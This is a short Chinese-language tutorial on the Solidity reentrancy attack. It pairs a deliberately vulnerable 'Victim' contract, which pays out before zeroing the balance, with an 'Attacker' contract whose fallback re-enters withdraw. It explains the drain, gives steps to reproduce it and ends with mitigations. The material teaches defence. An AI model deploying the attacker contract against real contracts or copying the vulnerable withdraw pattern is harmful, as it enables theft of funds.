本文用以下Solidity代码来举例:
pragma solidity ^0.4.26;
contract Victim {
mapping(address => uint) public userBalannce;
uint public amount = 0;
function Victim() payable{}
function withDraw(){
uint amount = userBalannce[msg.sender];
if(amount > 0){
msg.sender.call.value(amount)();
userBalannce[msg.sender] = 0;
}
}
function() payable{}
function receiveEther() payable{
if(msg.value > 0){
userBalannce[msg.sender] += msg.value;
}
}
function showAccount() public returns (uint){
amount = this.balance;
return this.balance;
}
}
contract Attacker{
uint public amount = 0;
uint public test = 0;
function Attacker() payable{}
function() payable{
test++;
Victim(msg.sender).withDraw();
}
function showAccount() public returns (uint){
amount = this.balance;
return this.balance;
}
function sendMoney(address addr){
Victim(addr).receiveEther.value(1 ether)();
}
function reentry(address addr){
Victim(addr).withDraw();
}
}
该攻击出现的原因是在victim合约中的withdraw函数使用了call()方法,call()方法调用完之后,由于找不到对应的方法签名,会默认调用fallback()函数。在本例中,attacker在调用完call()方法之后,接下来并不是执行userBalannce[msg.sender] = 0; 而是Attacker收到了Ether后,调用了回调函数,在回调函数中,又重新调用了Victim的withdraw。因此形成了一个循环,直至Victim中的Ether被清0.
首先由钱包1创建victim合约,并向victim合约中充值1ETH,接着由钱包2创建attacker合约,并向attacker合约中充值0.1ETH。接着通过钱包2调用attacker合约向victim合约充值0.1ETH,最后调用Reentry函数,将victim中的ETH全部转到attacker合约中。
(1) 使用transfer()函数:由于transfer转账功能只能发送2300gas不足以使目的地址/合约调用另外一份合约(即重入发送合约);
(2) 引入互斥锁。也就是说,要添加一个在代码执行过程中锁定合约的状态变量,阻止重入调用。